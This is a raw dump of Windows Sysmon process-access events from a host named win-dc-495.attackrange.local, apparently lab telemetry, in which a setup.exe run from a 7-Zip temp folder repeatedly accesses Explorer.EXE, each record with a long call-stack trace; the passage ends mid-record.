13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\A